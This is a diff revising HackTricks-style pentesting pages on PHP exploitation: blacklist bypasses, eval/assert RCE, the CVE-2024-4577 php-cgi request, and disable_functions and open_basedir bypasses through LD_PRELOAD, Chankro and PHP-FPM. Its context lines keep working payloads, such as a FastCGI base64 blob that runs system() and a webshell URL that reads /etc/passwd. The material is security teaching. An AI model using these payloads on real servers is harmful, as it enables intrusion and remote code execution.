 
-The same error occurs with `strcasecmp()`
+The same legacy pattern applies to `strcasecmp()`.
 
 ### Strict type Juggling
 
@@ -80,11 +80,11 @@ Even if `===` is **being used** there could be errors that makes the **compariso
 
 ### preg_match(/^.\*/)
 
-**`preg_match()`** could be used to **validate user input** (it **checks** if any **word/regex** from a **blacklist** is **present** on the **user input** and if it's not, the code can continue it's execution).
+Applications sometimes use **`preg_match()`** to reject input matching a blacklist. This is fragile because regex semantics and error returns can be mishandled.
 
 #### New line bypass
 
-However, when delimiting the start of the regexp`preg_match()` **only checks the first line of the user input**, then if somehow you can **send** the input in **several lines**, you could be able to bypass this check. Example:
+Without the `s` modifier, dot (`.`) does not match a newline. Consequently, a pattern anchored with `^` and built around `.*` may inspect only the first line even though `preg_match()` is processing the complete subject. Multiline input can then bypass the intended blacklist. For example:
 
 ```php
 $myinput="aaaaaaa
@@ -112,7 +112,7 @@ Find an example here: [https://ramadistra.dev/fbctf-2019-rceservice](https://ram
 #### **Length error bypass**
 
 (This bypass was tried apparently on PHP 5.2.5 and I couldn't make it work on PHP 7.3.15)\
-If you can send to `preg_match()` a valid very **large input**, it **won't be able to process it** and you will be able to **bypass** the check. For example, if it is blacklisting a JSON you could send:
+Some older configurations can make `preg_match()` fail on a very **large input** after reaching PCRE resource limits. This only becomes a bypass if the application treats the `false` error return as equivalent to the integer `0` “no match” result. For example, when blacklisting JSON, test:
 
 ```bash
 payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'
@@ -185,8 +185,8 @@ Check:
 
 ### password_hash/password_verify
 
-This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\
-The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD_DEFAULT is frequently the same as PASSWORD_BCRYPT.** And currently, **PASSWORD_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used:
+These functions are typically used to **hash passwords** and **verify** a password against a stored hash.\
+PHP supports multiple algorithm constants. `PASSWORD_DEFAULT` currently uses bcrypt but is designed to change over time, while `PASSWORD_BCRYPT` produces `$2y$` hashes. Bcrypt truncates passwords at 72 bytes, so inputs sharing the same first 72 bytes verify against the same bcrypt hash.<sup>[[18]](#references)</sup>
 
 ```php
 $cont=71; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW
@@ -200,7 +200,7 @@ True
 
 #### Causing error after setting headers
 
-From [**this twitter thread**](https://twitter.com/pilvar222/status/1784618120902005070?t=xYn7KdyIvnNOlkVaGbgL6A&s=19) you can see that sending more than 1000 GET params or 1000 POST params or 20 files, PHOP is not going to be setting headers in the response.<sup>[[7]](#references)</sup>
+As demonstrated in [**this thread**](https://twitter.com/pilvar222/status/1784618120902005070?t=xYn7KdyIvnNOlkVaGbgL6A&s=19), exceeding PHP input-count limits—for example, more than 1,000 GET or POST parameters or 20 uploaded files under the tested configuration—can interfere with application header-setting logic.<sup>[[7]](#references)</sup>
 
 Allowing to bypass for example CSP headers being set in codes like:
 
@@ -219,7 +219,7 @@ In the following scenario the **attacker made the server throw some big errors**
 
 ## SSRF in PHP functions
 
-Check ther page:
+See:
 
 
 {{#ref}}
@@ -267,8 +267,7 @@ preg_replace(pattern,replace,base)
 preg_replace("/a/e","phpinfo()","whatever")
 ```
 
-To execute the code in the "replace" argument is needed at least one match.\
-This option of preg_replace has been **deprecated as of PHP 5.5.0.**
+The pattern must match at least once to execute the replacement. The `/e` (`PREG_REPLACE_EVAL`) modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this is a PHP 5-era technique.<sup>[[19]](#references)</sup>
 
 ### **RCE via Eval()**
 
@@ -282,7 +281,7 @@ This option of preg_replace has been **deprecated as of PHP 5.5.0.**
 
 ### **RCE via Assert()**
 
-This function within php allows you to **execute code that is written in a string** in order to **return true or false** (and depending on this alter the execution). Usually the user variable will be inserted in the middle of a string. For example:\
+Before PHP 8.0, `assert()` could evaluate a string as PHP code; that behavior was deprecated in PHP 7.2 and removed in PHP 8.0. The following technique therefore applies only to older runtimes where string assertions are enabled.<sup>[[17]](#references)</sup> Usually the user variable is inserted into the middle of an assertion string. For example:\
 `assert("strpos($_GET['page']),'..') === false")` --> In this case to get **RCE** you could do:
 
 ```
@@ -297,7 +296,7 @@ You will need to **break** the code **syntax**, **add** your **payload**, and th
 
 ### **RCE via usort()**
 
-This function is used to sort an array of items using an specific function.\
+This function sorts an array using a specified callback.\
 To abuse this function:
 
 ```php
@@ -328,9 +327,9 @@ To discover the number of parenthesis that you need to close:
 - `?order=id);}//`: we get a **warning**. That seems about right.
 - `?order=id));}//`: we get an error message (`Parse error: syntax error, unexpected ')' i`). We probably have too many closing brackets.
 
-### **RCE via .httaccess**
+### **RCE via .htaccess**
 
-If you can **upload** a **.htaccess**, then you can **configure** several things and even execute code (configuring that files with extension .htaccess can be **executed**).
+If you can upload an Apache **`.htaccess`** file into a directory where overrides are permitted, you may be able to remap an attacker-controlled extension to the PHP handler and execute uploaded code.
 
 Different .htaccess shells can be found [here](https://github.com/wireghoul/htshells)
 
@@ -353,13 +352,13 @@ If you find a vulnerability that allows you to **modify env variables in PHP** (
 
 ### XAMPP CGI RCE - CVE-2024-4577
 
-The webserver parses HTTP requests and passes them to a PHP script executing a request such as as [`http://host/cgi.php?foo=bar`](http://host/cgi.php?foo=bar&ref=labs.watchtowr.com) as `php.exe cgi.php foo=bar`, which allows a parameter injection. This would allow to inject the following parameters to load the PHP code from the body:<sup>[[11]](#references)</sup>
+In affected Windows CGI deployments, the web server parses an HTTP request and constructs arguments for `php-cgi.exe`. The vulnerable character conversion allows option injection, including these directives for loading PHP code from the request body:<sup>[[11]](#references)</sup>
 
 ```jsx
 -d allow_url_include=1 -d auto_prepend_file=php://input
 ```
 
-Moreover, it's possible to inject the "-" param using the 0xAD character due to later normalization of PHP. Check. the exploit example from [**this post**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/):<sup>[[11]](#references)</sup>
+The exploit substitutes byte `0xAD` for `-` before later normalization. See the example from [**this post**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/):<sup>[[11]](#references)</sup>
 
 ```jsx
 POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
@@ -391,11 +390,11 @@ Look if you can insert code in calls to these functions (from [here](https://www
 
 ```php
 exec, shell_exec, system, passthru, eval, popen
-unserialize, include, file_put_cotents
-$_COOKIE | if #This mea
+unserialize, include, file_put_contents
+$_COOKIE | if # Track attacker-controlled sources into conditional or dangerous sinks
 ```
 
-If yo are debugging a PHP application you can globally enable error printing in`/etc/php5/apache2/php.ini` adding `display_errors = On` and restart apache : `sudo systemctl restart apache2`
+When debugging an authorized PHP application, error display can be enabled in the applicable `php.ini` (for example, `/etc/php5/apache2/php.ini`) with `display_errors = On`; then restart Apache with `sudo systemctl restart apache2`. Do not enable this in production because error output may disclose secrets.
 
 ### Deobfuscating PHP code
 
@@ -403,11 +402,11 @@ You can use the **web**[ **www.unphp.net**](http://www.unphp.net) **to deobfusca
 
 ## PHP Wrappers & Protocols
 
-PHP Wrappers ad protocols could allow you to **bypass write and read protections** in a system and compromise it. For [**more information check this page**](../../../pentesting-web/file-inclusion/index.html#lfi-rfi-using-php-wrappers-and-protocols).
+PHP wrappers and protocols can sometimes **bypass application-level read or write restrictions**. For [**more information, see this page**](../../../pentesting-web/file-inclusion/index.html#lfi-rfi-using-php-wrappers-and-protocols).
 
 ## Xdebug unauthenticated RCE
 
-If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)
+If **Xdebug** is enabled in `phpinfo()` output, assess whether its remote-debugging configuration is reachable and vulnerable. One historical exploit implementation is [nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit).
 
 ## Variable variables
 
@@ -552,5 +551,9 @@ $___($_[_]); // ASSERT($_POST[_]);
 - [13] [HackTheBox - Wall](https://www.youtube.com/watch?v=SyWUsN0yHKI&feature=youtu.be)
 - [14] [Bypass WAF – PHP Webshell Without Numbers and Letters](https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/)
 - [15] [Web challenge – mgp25 blog (PHP XOR shellcode without letters or numbers)](https://mgp25.com/ctf/Web-challenge/)
+- [16] [PHP 8.0 migration: string-to-number comparison changes](https://www.php.net/manual/en/migration80.incompatible.php#language.types.string.number-comparisons)
+- [17] [PHP 8.0 backward-incompatible standard-library changes](https://www.php.net/manual/en/migration80.incompatible.php#migration80.incompatible.standard)
+- [18] [PHP manual: `password_hash`](https://www.php.net/manual/en/function.password-hash.php)
+- [19] [PHP 7.0 migration: changed functions](https://www.php.net/manual/en/migration70.changed-functions.php)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
@@ -6,7 +6,7 @@
 
 ### PHP Command Execution
 
-**Note:** A [p0wny-shell](https://github.com/flozz/p0wny-shell/blob/master/shell.php) php webshell can **automatically** check and bypass the following function if some of them be disabled.
+**Note:** [p0wny-shell](https://github.com/flozz/p0wny-shell/blob/master/shell.php) can automatically identify available command-execution functions when others are disabled.
 
 **exec** - Returns last line of commands output
 
@@ -52,6 +52,8 @@ proc_close(proc_open("uname -a",array(),$something));
 
 **preg_replace**
 
+The `/e` modifier shown below is a legacy PHP 5 technique; it was removed in PHP 7.0.
+
 ```php
 <?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
 ```
@@ -75,11 +77,11 @@ file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA
 Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.
 
 ```php
-${<php code>}              // If your input gets reflected in any PHP string, it will be executed.
+${<php code>}              // Legacy interpolation contexts only; ordinary reflection in a string is not enough.
 eval()
-assert()                   //  identical to eval()
-preg_replace('/.*/e',...)  // e does an eval() on the match
-create_function()          // Create a function and use eval()
+assert()                   // String evaluation was removed in PHP 8.0.
+preg_replace('/.*/e',...)  // Legacy: /e evaluated the replacement; removed in PHP 7.0.
+create_function()          // Legacy eval-based function creation; removed in PHP 8.0.
 include()
 include_once()
 require()
@@ -96,10 +98,10 @@ $func->invokeArgs(array());
 
 ## disable_functions & open_basedir
 
-**Disabled functions** is the setting that can be configured in `.ini` files in PHP that will **forbid** the use of the indicated **functions**. **Open basedir** is the setting that indicates to PHP the folder that it can access.\
-The PHP setting sue to be configured in the path _/etc/php7/conf.d_ or similar.
+**`disable_functions`** is an INI setting that prevents direct use of named internal functions. **`open_basedir`** restricts PHP filesystem operations to configured directory trees; it is an additional safeguard, not a complete operating-system sandbox.\
+These settings are commonly configured in a `php.ini` or a scanned directory such as `/etc/php/7.x/*/conf.d/`.
 
-Both configuration can be seen in the output of **`phpinfo()`**:
+Both configurations appear in **`phpinfo()`** output:
 
 ![PHP Code Execution - disable functions & open basedir: Both configuration can be seen in the output of phpinfo()](https://0xrick.github.io/images/hackthebox/kryptos/17.png)
 
@@ -107,8 +109,7 @@ Both configuration can be seen in the output of **`phpinfo()`**:
 
 ## open_basedir Bypass
 
-`open_basedir` will configure the folders that PHP can access, you **won't be able to to write/read/execute any file outside** those folders, but also you **won't even be able to list** other directories.\
-However, if somehow you are able to execute arbitrary PHP code you can **try** the following chunk of **codes** to try to **bypass** the restriction.
+`open_basedir` restricts path-based PHP filesystem operations outside its configured trees, including many reads, writes, and directory listings. It does not constrain every extension or external process in the same way. If you can execute arbitrary PHP, test the following techniques against the target version and configuration.
 
 ### Listing dirs with glob:// bypass
 
@@ -144,7 +145,7 @@ If **`php-fpm`** is configured you can abuse it to completely bypass **open_base
 
 ![Listing dirs with glob:// bypass - Full open basedir bypass abusing FastCGI: If php-fpm is configured you can abuse it to completely bypass open basedir](<../../../../images/image (577).png>)
 
-Note that the first thing you need to do is find where is the **unix socket of php-fpm**. It use to be under `/var/run` so you can **use the previous code to list the directory and find it**.\
+First find the **PHP-FPM Unix socket**. It is commonly under `/var/run` or `/run`, so the preceding directory-listing code may locate it.\
 Code from [here](https://balsn.tw/ctf_writeup/20190323-0ctf_tctf2019quals/#wallbreaker-easy).<sup>[[1]](#references)</sup>
 
 ```php
@@ -498,7 +499,7 @@ echo $client->request($params, $code)."\n";
 ?>
 ```
 
-This scripts will communicate with **unix socket of php-fpm** (usually located in /var/run if fpm is used) to execute arbitrary code. The `open_basedir` settings will be overwritten by the **PHP_VALUE** attribute that is sent.\
+This script communicates with the **PHP-FPM Unix socket** to execute a request with attacker-supplied FastCGI parameters. The sent **`PHP_VALUE`** can override per-directory settings such as `open_basedir` when the FPM pool and target script permit the request.\
 Note how `eval` is used to execute the PHP code you send inside the **cmd** parameter.\
 Also note the **commented line 324**, you can uncomment it and the **payload will automatically connect to the given URL and execute the PHP code** contained there.\
 Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd');` to get the content of the `/etc/passwd` file.
@@ -509,7 +510,7 @@ Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/p
 ## disable_functions Bypass
 
 If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\
-So, lets see how you can bypass this restriction (if you can)
+The following techniques may bypass the restriction when their prerequisites are present.
 
 ### Automatic bypass discovery
 
@@ -521,7 +522,7 @@ Just return to the beginning of this page and **check if any of the command exec
 
 ### LD_PRELOAD bypass
 
-It's well known that some functions in PHP like `mail()`are going to **execute binaries inside the system**. Therefore, you can abuse them using the environment variable `LD_PRELOAD` to make them load an arbitrary library that can execute anything.
+Some PHP functions, such as certain `mail()` configurations, invoke external binaries. If PHP can set `LD_PRELOAD` and launch a dynamically linked child process without the variable being stripped, an attacker may force that process to load a malicious library.
 
 #### Functions that can be used to bypass disable_functions with LD_PRELOAD
 
@@ -551,11 +552,11 @@ uid_t getuid(void){
 
 #### Bypass using Chankro
 
-In order to abuse this misconfiguration you can [**Chankro**](https://github.com/TarlogicSecurity/Chankro). This is a tool that will **generate a PHP exploit** that you need to upload to the vulnerable server and execute it (access it via web).\
-**Chankro** will write inside the victims disc the **library and the reverse shell** you want to execute and will use the**`LD_PRELOAD` trick + PHP `mail()`** function to execute the reverse shell.
+To automate this chain, you can use [**Chankro**](https://github.com/TarlogicSecurity/Chankro), which generates a PHP exploit to upload and invoke through the vulnerable application.\
+**Chankro** writes the library and payload to the victim's disk, then uses the **`LD_PRELOAD` technique and PHP `mail()`** to execute the payload.
 
 Note that in order to use **Chankro**, `mail` and `putenv` **cannot appear inside the `disable_functions` list**.\
-In the following example you can see how to **create a chankro exploit** for **arch 64**, that will execute `whoami` and save the out in _/tmp/chankro_shell.out_, chankro will **write the library and the payload** in _/tmp_ and the **final exploit** is going to be called **bicho.php** (that's the file you need to upload to the victims server):
+The following example creates a 64-bit Chankro exploit that runs `whoami` and saves its output in `/tmp/chankro_shell.out`. Chankro writes the library and payload under `/tmp`, and produces `bicho.php` for upload to the target:
 
 {{#tabs}}
 {{#tab name="shell.sh"}}
@@ -585,19 +586,19 @@ Note that using **PHP** you can **read and write files, create directories and c
 You can even **dump databases**.\
 Maybe using **PHP** to **enumerate** the box you can find a way to escalate privileges/execute commands (for example reading some private ssh key).
 
-I have created a webshell that makes very easy to perform this actions (note that most webshells will offer you this options also): [https://github.com/carlospolop/phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited)
+The [phpwebshelllimited](https://github.com/carlospolop/phpwebshelllimited) project makes these filesystem and enumeration actions easier; many other web shells expose similar operations.
 
 ### Modules/Version dependent bypasses
 
 There are several ways to bypass disable_functions if some specific module is being used or exploit some specific PHP version:
 
 - [**FastCGI/PHP-FPM (FastCGI Process Manager)**](disable_functions-bypass-php-fpm-fastcgi.md)
-- [**Bypass with FFI - Foreign Function Interface enabled**](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/broken-reference/README.md)
+- **FFI enabled:** unrestricted PHP FFI can call native-library functions directly, so it defeats a function-name blocklist. Web requests normally cannot use FFI under its default `preload` setting; the dangerous prerequisite is `ffi.enable=true` or an exposed preloaded FFI scope.<sup>[[5]](#references)</sup>
 - [**Bypass via mem**](disable_functions-bypass-via-mem.md)
 - [**mod_cgi**](disable_functions-bypass-mod_cgi.md)
 - [**PHP Perl Extension Safe_mode**](disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md)
 - [**dl function**](disable_functions-bypass-dl-function.md)
-- [**This exploit**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass)
+- [**This exploit collection**](https://github.com/mm0r1/exploits/tree/master/php-filter-bypass) documents the following historical target ranges. Treat “all versions” as the repository author's contemporaneous claim and verify the exact PHP build before use:
   - 5.\* - exploitable with minor changes to the PoC
   - 7.0 - all versions to date
   - 7.1 - all versions to date
@@ -669,7 +670,7 @@ These functions accept a string parameter which could be used to call a function
 
 ### Information Disclosure
 
-Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability.
+Most of these calls are not dangerous sinks by themselves. They become information-disclosure issues when an attacker controls their use or can view sensitive returned data. Exposed `phpinfo()` output is particularly valuable because it reveals configuration, paths, extensions, and environment details.
 
 ```php
 phpinfo
@@ -715,7 +716,7 @@ posix_setuid
 
 ### Filesystem Functions
 
-According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow_url_fopen=On then a url can be used as a file path, so a call to copy($\_GET\['s'], $\_GET\['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.
+Filesystem calls become dangerous when attacker-controlled data reaches a path or URL argument. For example, with `allow_url_fopen=On`, a URL can be accepted as a source path, so `copy($_GET['s'], $_GET['d'])` may fetch remote content and write it to an attacker-selected accessible destination. Similar source/sink combinations can provide file disclosure, overwrite, server-side request forgery, or a pivot to another host.
 
 **Open filesystem handler**
 
@@ -824,6 +825,6 @@ get_meta_tags
 - [2] [Eval Me - BSides Delhi CTF 2019 writeup](https://blog.bi0s.in/2019/10/23/Web/BSidesDelhi19-evalme/)
 - [3] [How to bypass disable_functions and open_basedir](https://www.tarlogic.com/en/blog/how-to-bypass-disable_functions-and-open_basedir/)
 - [4] [Exploitable PHP functions - Stack Overflow](https://stackoverflow.com/questions/3115559/exploitable-php-functions)
+- [5] [PHP RFC: Foreign Function Interface](https://wiki.php.net/rfc/ffi)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-

--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md
@@ -2,9 +2,9 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## PHP 7.0-7.4 (\*nix only)
+## PHP 7.0–7.4 (\*nix only)
 
-From [https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php)<sup>[[1]](#references)</sup>
+This historical PoC abuses a use-after-free condition involving exception backtraces to replace an internal function handler with `system`. It targets Unix-like PHP 7.0–7.4 builds available when the exploit was published; memory layout, build options, and later package patches can affect reliability. The original source and preserved technical comments follow.<sup>[[1]](#references)</sup>
 
 ```php
 <?php

--- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
+++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
@@ -1,32 +1,32 @@
-# disable_functions bypass - php-fpm/FastCGI
+# `disable_functions` bypass - PHP-FPM/FastCGI
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
 ## PHP-FPM
 
-**PHP-FPM** is presented as a **superior alternative** to the standard PHP FastCGI, offering features that are particularly **beneficial for websites with high traffic**. It operates through a master process that oversees a collection of worker processes. For a PHP script request, it's the web server that initiates a **FastCGI proxy connection to the PHP-FPM service**. This service has the capability to **receive requests either via network ports on the server or Unix sockets**.
+**PHP-FPM** is PHP's FastCGI Process Manager. A master process manages pools of workers, while a web server sends PHP-script requests to the service over FastCGI. A pool can listen on a TCP address or a Unix socket.
 
-Despite the intermediary role of the proxy connection, PHP-FPM needs to be operational on the same machine as the web server. The connection it uses, while proxy-based, differs from conventional proxy connections. Upon receiving a request, an available worker from PHP-FPM processes it—executing the PHP script and then forwarding the results back to the web server. After a worker concludes processing a request, it becomes available again for upcoming requests.
+PHP-FPM commonly runs on the same host as the web server, especially when using a Unix socket, but a TCP listener can be on another host. An available worker executes the selected PHP script, returns the result to the web server, and becomes available for another request.
 
 ## But what is CGI and FastCGI?
 
 ### CGI
 
-Normally web pages, files and all of the documents which are transferred from the web server to the browser are stored in a specific public directory such as home/user/public_html. **When the browser requests certain content, the server checks this directory and sends the required file to the browse**r.
+Static pages and assets are commonly stored in a public directory such as `/home/user/public_html`. **When a browser requests static content, the server resolves and sends the requested file.**
 
-If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client.
+With classic **CGI**, the server maps configured scripts—often under a `cgi-bin` directory—to executable programs instead of returning their source. The server passes request metadata and input to the program; after processing, the program returns output that the server forwards to the HTTP client.
 
 For example, when the CGI script [http://mysitename.com/**cgi-bin/file.pl**](http://mysitename.com/**cgi-bin/file.pl**) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. (explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html))<sup>[[1]](#references)</sup>
 
 ### FastCGI
 
-[FastCGI](https://en.wikipedia.org/wiki/FastCGI) is a newer web technology, an improved [CGI](http://en.wikipedia.org/wiki/Common_Gateway_Interface) version as the main functionality remains the same.
+[FastCGI](https://en.wikipedia.org/wiki/FastCGI) preserves CGI's request/response role while keeping application processes alive across requests instead of starting a new process for each request.
 
-The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity, as well to address the scalability shortcomings of CGI technology. To meet those requirements [Open Market](http://en.wikipedia.org/wiki/Open_Market) introduced **FastCGI – a high performance version of the CGI technology with enhanced capabilities.**
+Open Market introduced **FastCGI** to address the process-creation and scalability costs of traditional CGI.<sup>[[1]](#references)</sup>
 
 ## disable_functions bypass
 
-It's possible to run PHP code abusing the FastCGI and avoiding the `disable_functions` limitations.
+Direct access to a PHP-FPM listener can inject FastCGI parameters, select executable scripts, and sometimes load attacker-controlled PHP configuration or extensions. Request-level `PHP_VALUE` can relax some settings, but it does **not** reliably unset `disable_functions`; the techniques below distinguish those cases.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ### Practical reality check
 
@@ -47,18 +47,18 @@ If you first need to enumerate a reachable FastCGI listener or build raw FastCGI
 > [!CAUTION]
 > Use Gopherus here mainly to reach the FastCGI listener and inject FastCGI parameters. Do **not** expect `PHP_VALUE` with `disable_functions =` to reliably re-enable disabled functions in modern PHP-FPM.
 
-Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands:
+Using [Gopherus](https://github.com/tarunkant/Gopherus), you can generate a request for a reachable FastCGI listener. Command execution still depends on a usable script, directives, and an available execution primitive:
 
 ![Practical reality check - Via Gopherus: Using Gopherus you can generate a payload to send to the FastCGI listener and execute arbitrary commands](<../../../../images/image (227).png>)
 
-Then, you can grab the urlencoded payload and decode it and transform to base64, \[**using this recipe of cyberchef for example**]\([http://icyberchef.com/index.html#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw](http://icyberchef.com/#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw)). And then copy/pasting the abse64 in this php code:
+Decode the URL-encoded FastCGI bytes and Base64-encode the raw result—for example, with CyberChef's `URL Decode` followed by `To Base64`. Paste that Base64 into the following PHP sender:
 
 ```php
 <?php
 $fp = fsockopen("unix:///var/run/php/php7.0-fpm.sock", -1, $errno, $errstr, 30); fwrite($fp,base64_decode("AQEAAQAIAAAAAQAAAAAAAAEEAAEBBAQADxBTRVJWRVJfU09GVFdBUkVnbyAvIGZjZ2ljbGllbnQgCwlSRU1PVEVfQUREUjEyNy4wLjAuMQ8IU0VSVkVSX1BST1RPQ09MSFRUUC8xLjEOAkNPTlRFTlRfTEVOR1RINzYOBFJFUVVFU1RfTUVUSE9EUE9TVAlLUEhQX1ZBTFVFYWxsb3dfdXJsX2luY2x1ZGUgPSBPbgpkaXNhYmxlX2Z1bmN0aW9ucyA9IAphdXRvX3ByZXBlbmRfZmlsZSA9IHBocDovL2lucHV0DxdTQ1JJUFRfRklMRU5BTUUvdmFyL3d3dy9odG1sL2luZGV4LnBocA0BRE9DVU1FTlRfUk9PVC8AAAAAAQQAAQAAAAABBQABAEwEADw/cGhwIHN5c3RlbSgnd2hvYW1pID4gL3RtcC93aG9hbWkudHh0Jyk7ZGllKCctLS0tLU1hZGUtYnktU3B5RDNyLS0tLS0KJyk7Pz4AAAAA"));
 ```
 
-Uploading and accessing this script the exploit is going to be sent to FastCGI. In practice, this is useful to **reach PHP-FPM and set request-level directives** such as `auto_prepend_file` and frequently `open_basedir`, but **not** to truly clear `disable_functions`.
+After this script is uploaded and requested, it sends the decoded FastCGI record to PHP-FPM. In practice, this is useful for setting request-level directives such as `auto_prepend_file` and often `open_basedir`, but **not** for truly clearing `disable_functions`.
 
 ### PHP exploit
 
@@ -432,11 +432,10 @@ This matches the PHP documentation much better than the original guess:
 
 So, for this technique, think of `PHP_VALUE` as the primitive to relax `open_basedir` and to inject `auto_prepend_file`, but **not** as a reliable way to unset `disable_functions`.
 
